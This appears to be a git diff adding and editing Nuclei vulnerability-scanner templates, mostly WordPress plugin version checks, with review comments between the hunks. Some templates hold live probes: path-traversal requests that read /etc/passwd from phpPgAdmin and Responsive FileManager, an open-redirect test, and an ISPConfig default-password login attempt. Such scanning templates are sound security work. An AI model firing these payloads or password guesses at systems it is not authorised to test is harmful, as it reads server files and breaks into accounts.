true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "header-footer-code" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6631.yaml b/poc/cve/CVE-2024-6631.yaml new file mode 100644 index 0000000000..f5b7eac6ef 
--- /dev/null +++ b/poc/cve/CVE-2024-6631.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6631 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: low + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several AJAX actions in all versions up to, and including, 3.1.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform unauthorized actions, such as updating plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N + cvss-score: 5 + cve-id: CVE-2024-6631 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-6631' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6665.yaml b/poc/cve/CVE-2024-6665.yaml new file mode 100644 index 0000000000..1948994400 --- /dev/null 
+++ b/poc/cve/CVE-2024-6665.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6665 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.5 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'yt_apikey' parameter in all versions up to, and including, 4.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2ff5094a-8cf2-4c18-921d-7ec31d60c13a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6665 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6665' + tags: cve,wordpress,wp-plugin,kbucket,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6667.yaml b/poc/cve/CVE-2024-6667.yaml new file mode 100644 index 0000000000..664e57584b --- /dev/null 
+++ b/poc/cve/CVE-2024-6667.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6667 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The KBucket: Your Curated Content in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via $_SERVER['REQUEST_URI'] in all versions up to, and including, 4.1.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6667 + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:CVE-2024-6667' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7351.yaml b/poc/cve/CVE-2024-7351.yaml new file mode 100644 index 0000000000..cf0eeb23c2 --- /dev/null +++ b/poc/cve/CVE-2024-7351.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7351 + +info: + name: > + Simple Job Board <= 2.12.3 - Authenticated (Editor+) PHP Object Injection + author: topscoder + severity: low + description: > + The Simple Job Board plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.12.3 via deserialization of untrusted input when editing job applications. This makes it possible for authenticated attackers, with Editor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6312b9-1b66-4b4f-a78d-515fa4aab63b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-7351 + metadata: + fofa-query: "wp-content/plugins/simple-job-board/" + google-query: inurl:"/wp-content/plugins/simple-job-board/" + shodan-query: 'vuln:CVE-2024-7351' + tags: cve,wordpress,wp-plugin,simple-job-board,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/simple-job-board/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "simple-job-board" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.12.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7568.yaml b/poc/cve/CVE-2024-7568.yaml new file mode 100644 index 0000000000..19523db496 --- /dev/null 
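Review bot: `severity: low` (and the `low` tag) contradicts the template's own `cvss-score: 7.2` with a `C:H/I:H/A:H` vector, which is in the High band; anyone running `-severity high` will never see this template. Either the score or the severity is wrong, and the cited Wordfence entry should decide which. If High is correct the change is `severity: high` and `tags: cve,wordpress,wp-plugin,simple-job-board,high`.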
+++ b/poc/cve/CVE-2024-7568.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7568 + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + The Favicon Generator plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the output_sub_admin_page_0 function. This makes it possible for unauthenticated attackers to delete arbitrary files on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. The plugin author deleted the functionality of the plugin to patch this issue and close the plugin, we recommend seeking an alternative to this plugin. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-7568 + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:CVE-2024-7568' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file 
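Review bot: `severity: medium` alongside `cvss-score: 9.6` (`C:H/I:H/A:H`, scope changed) is inconsistent; 9.6 is Critical, and a CSRF that deletes arbitrary files on the server is not a medium for triage purposes. Align the two (`severity: critical` plus the `critical` tag) or correct the score from the Wordfence reference. Since the description says the author's "fix" was to strip the functionality and close the plugin, a short comment by the dsl matcher noting that the `<= 1.5` comparison presumably tracks the last functional release would save the next reader a lookup.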
diff --git a/poc/cve/CVE-2024-7656.yaml b/poc/cve/CVE-2024-7656.yaml new file mode 100644 index 0000000000..9396fcc0f6 --- /dev/null +++ b/poc/cve/CVE-2024-7656.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7656 + +info: + name: > + Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection + author: topscoder + severity: low + description: > + The Image Hotspot by DevVN plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.2.5 via deserialization of untrusted input in the 'devvn_ihotspot_shortcode_func' function. This makes it possible for authenticated attackers, with Author-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7656 + metadata: + fofa-query: "wp-content/plugins/devvn-image-hotspot/" + google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/" + shodan-query: 'vuln:CVE-2024-7656' + tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "devvn-image-hotspot" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.5') \ No newline at end of file 
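Review bot: `severity: low` disagrees with the template's `cvss-score: 8.8` (`PR:L`, `C:H/I:H/A:H`), which is High; Author-level PHP object injection is rated well above low by the Wordfence source the template cites. Set `severity: high` and the `high` tag, or fix the score. The description's "No known POP chain" caveat is worth keeping visible at the matcher so a hit is not read as proven RCE: `# version-inference only; exploitability depends on a gadget chain from another plugin or theme`.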
diff --git a/poc/cve/CVE-2024-8120.yaml b/poc/cve/CVE-2024-8120.yaml new file mode 100644 index 0000000000..aa56580c71 --- /dev/null +++ b/poc/cve/CVE-2024-8120.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8120 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions + author: topscoder + severity: medium + description: > + The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.14. This is due to missing or incorrect nonce validation on several functions in the class/class-image-otimizer.php file. This makes it possible for unauthenticated attackers to update plugin settings along with performing other actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N + cvss-score: 4.7 + cve-id: CVE-2024-8120 + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:CVE-2024-8120' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file 
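Review bot: The `name` reads `Cross-Site Request in Several AJAX Actions`; the word "Forgery" is missing, so the title no longer names the vulnerability class that the description and `cve-id` refer to. Change it to `ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request Forgery in Several AJAX Actions`. Otherwise this is the same readme-based version inference as its siblings, and a one-line comment saying so above the dsl matcher would help whoever triages a hit.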
diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index e714f96cca..fda684a006 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml @@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index e87149510b..20a95213bc 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml 
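Review bot: The payload `_language=../../../../../../../../etc/passwd%00` relies on null-byte truncation of the included path, which PHP removed in 5.3.4, so a phpPgAdmin 4.2.1 instance running on a newer interpreter will come back clean even if `register_globals` is still on; the hunk does not mention that limit. I would add above `path:` something like `# %00 truncation only works on PHP < 5.3.4; a clean result on newer PHP is not proof of absence`. The regex `root:[x*]:0:0` also misses locked entries of the form `root:!:0:0`; `root:[x*!]:0:0` is a cheap widening.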
@@ -1,25 +1,43 @@ id: CVE-2017-14524 + info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect author: 0x_Akoko - severity: low - description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. + severity: medium + description: | + OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. + remediation: | + Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://www.cvedetails.com/cve/CVE-2017-14524 - - https://vuldb.com/?id.107201 - tags: cve,cve2017,redirect,opentext + - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 + - http://seclists.org/fulldisclosure/2017/Sep/57 + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-14524 cwe-id: CWE-601 -requests: + epss-score: 0.00258 + epss-percentile: 0.6357 + cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: opentext + product: documentum_administrator + tags: cve2017,cve,redirect,opentext,seclists + +http: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' + - 
'{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' + matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' +# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-1271.yaml b/poc/cve/cve-2018-1271.yaml index ccf03eab13..548327e206 100644 --- a/poc/cve/cve-2018-1271.yaml +++ b/poc/cve/cve-2018-1271.yaml 
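Review bot: The reference list now carries the same seclists advisory twice (`https://seclists.org/fulldisclosure/2017/Sep/57` and `http://seclists.org/fulldisclosure/2017/Sep/57`), and `https://github.com/ARPSyndicate/cvemon` is an aggregator rather than a source; drop those two and keep the OpenText KB and NVD entries. The `remediation` text is generic; if the OpenText knowledge-base article names a fixed build, state it instead of "apply the latest security patches". The trailing `# digest:` line is ProjectDiscovery's signature over the upstream file, so if anything here diverges from the signed content nuclei will report a signature mismatch — either keep the file byte-identical to upstream or drop the digest line.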
@@ -1,18 +1,20 @@ id: CVE-2018-1271 - info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." - + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET path: diff --git a/poc/cve/cve-2018-15473.yaml b/poc/cve/cve-2018-15473.yaml index 2392e8714b..e2eabe600d 100644 --- a/poc/cve/cve-2018-15473.yaml +++ b/poc/cve/cve-2018-15473.yaml 
@@ -1,28 +1,28 @@ id: CVE-2018-15473 + info: name: OpenSSH Username Enumeration <= v7.7 author: r3dg33k,daffainfo,forgedhallpass severity: medium description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-15473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-15473 cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 + + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: - type: regex regex: diff --git a/poc/cve/cve-2018-15535.yaml b/poc/cve/cve-2018-15535.yaml index ed7aa501ed..a4fa48f002 100644 --- a/poc/cve/cve-2018-15535.yaml +++ b/poc/cve/cve-2018-15535.yaml 
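Review bot: This hunk deletes `tags: network,openssh,cve,cve2018`, so the template no longer participates in any `-tags cve` or `-tags network` run, and it also drops the OpenBSD fix commit and the Debian bug that document the patch, while `cvss-score: 5.3` → `5.30` is cosmetic; that reads like a regression rather than an enhancement. The banner regex `OpenSSH_(?:[1-6]...|7\.[0-7]...)` matches on version string alone, so distribution builds that backported the fix (the removed `bugs.debian.org/906236` link is exactly that case) still match. Restore the tags line and add `# banner-based: distro builds that backported the fix still match, verify before reporting` above the matcher.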
@@ -1,31 +1,32 @@ id: CVE-2018-15535 + info: - name: Responsive FileManager <9.13.4 - Local File Inclusion + name: Responsive FileManager < 9.13.4 - Directory Traversal author: daffainfo severity: high - description: Responsive FileManager before version 9.13.4 is susceptible to local file inclusion via filemanager/ajax_calls.php because it uses external input to construct a pathname that should be within a restricted directory. Instead, because it does not properly neutralize get_file sequences such as ".." can resolve to a location that is outside of that directory, aka local file inclusion. + description: filemanager/ajax_calls.php in tecrail Responsive FileManager before 9.13.4 uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize get_file sequences such as ".." that can resolve to a location that is outside of that directory, aka Directory Traversal. reference: - https://www.exploit-db.com/exploits/45271 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15535 - - http://seclists.org/fulldisclosure/2018/Aug/34 - - https://www.exploit-db.com/exploits/45271/ + - https://www.cvedetails.com/cve/CVE-2018-15535 + classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-score: 7.50 cve-id: CVE-2018-15535 cwe-id: CWE-22 - tags: cve,cve2018,lfi + requests: - method: GET path: - "{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd" + matchers-condition: and matchers: + - type: regex regex: - - "root:.*:0:0:" + - "root:.*:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/07/07 diff --git a/poc/default/ispconfig-default-login.yaml b/poc/default/ispconfig-default-login.yaml new file mode 100644 index 0000000000..8151c6d669 --- /dev/null +++ b/poc/default/ispconfig-default-login.yaml 
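Review bot: The `tags: cve,cve2018,lfi` line is deleted, which removes the template from every tag-filtered scan, while the surrounding metadata edits are cosmetic (`7.5` → `7.50`, the NVD and full-disclosure links replaced by a cvedetails mirror). Restore it as `tags: cve,cve2018,lfi,traversal` — the new name calls the issue Directory Traversal — and keep the NVD link as the canonical reference. The matcher change `root:.*:0:0:` → `root:.*:0:0` is fine on its own.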
@@ -0,0 +1,63 @@ +id: ispconfig-default-login + +info: + name: ISPConfig - Default Password + author: pussycat0x + severity: high + description: | + ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: "http.title:\"ispconfig\"" + tags: default-login,ispconfig + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Connection: close + Referer: {{RootURL}}/login/ + + username={{username}}&password={{password}}&s_mod=login&s_pg=index + + - | + GET /sites/web_vhost_domain_list.php HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Referer: {{RootURL}}/index.php + + attack: pitchfork + payloads: + username: + - 'admin' + - 'guest' + - 'root' + password: + - 'admin' + - 'password' + - 'toor' + + stop-at-first-match: true + host-redirects: true + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - Tools + - Websites + condition: and + + - type: status + status: + - 200 +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/wowza-streaming-detect.yaml b/poc/detect/wowza-streaming-detect.yaml index 3d40c90531..20093618e0 100644 --- a/poc/detect/wowza-streaming-detect.yaml +++ b/poc/detect/wowza-streaming-detect.yaml 
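Review bot: `attack: pitchfork` pairs the two lists index-wise, so only `admin:admin`, `guest:password` and `root:toor` are tried; `admin/admin` is the documented ISPConfig default as far as I know, the other two look speculative, and `max-request: 9` is those 3 pairs times 3 raw requests — worth a comment so nobody "fixes" it into a 9-pair clusterbomb: `# pitchfork: three fixed pairs (admin/admin is the ISPConfig default); 3 pairs x 3 requests = max-request 9`. The `status` matcher has no `part`, so it applies to the last response only, and with `host-redirects: true` a failed login that bounces `/sites/web_vhost_domain_list.php` back to the login form also yields 200, which leaves the decision entirely to the `Tools`/`Websites` word check; say so in a comment by the matchers. The `# digest:` line is an upstream signature and only verifies if the file is byte-identical to ProjectDiscovery's copy.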
@@ -1,15 +1,17 @@ id: wowza-streaming-engine + info: name: Wowza Streaming Engine author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 tags: panel + requests: - method: GET path: - '{{BaseURL}}/enginemanager/ftu/welcome.htm' + matchers-condition: and matchers: - type: word diff --git a/poc/favicon/favicon-generator.yaml b/poc/favicon/favicon-generator.yaml new file mode 100644 index 0000000000..fe88f3c6fd --- /dev/null +++ b/poc/favicon/favicon-generator.yaml @@ -0,0 +1,59 @@ +id: favicon-generator + +info: + name: > + Favicon Generator <= 1.5 - Cross-Site Request Forgery to Arbitrary File Deletion + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6eb3ad80-3510-4018-91af-b733ef62e28f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/favicon-generator/" + google-query: inurl:"/wp-content/plugins/favicon-generator/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,favicon-generator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-generator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "favicon-generator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5') \ No newline at end of file 
